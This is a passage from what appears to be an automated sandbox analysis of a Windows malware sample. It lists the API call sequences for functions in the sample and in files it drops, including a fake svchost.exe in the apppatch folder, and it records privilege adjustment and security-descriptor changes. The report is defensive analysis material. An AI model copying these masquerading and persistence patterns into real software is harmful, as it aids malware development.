SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,Unl
ockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_014D4B00
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02BB7FD0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,
GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BD2BB0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02BD2B40
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_02BBD970
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02BB1170
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02BD1690
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02BB3610
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02BCCE10
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02BB1660
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02BD3F50
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02BD3CE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02BD1460
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_02BCADE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02BD25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_006A6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_00691170
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_0069D970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_006B2B40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_006B2BB0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_006B1460
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_006B3CE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserNameA,memset,StrStrIA,5_2_006AADE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_006B25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_00691660
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_00693610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_006ACE10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_006B1690
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_006B3F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_006A5720
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_00697FD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_014E6CA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_014D1170
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_014DD970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_014F2B40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_014F2BB0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_014F25C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserNameA,memset,StrStrIA,6_2_014EADE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_014F1460
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_014F3CE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_014F3F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_014E5720
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_014D7FD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_014D1660
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_014D3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_014ECE10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_014F1690
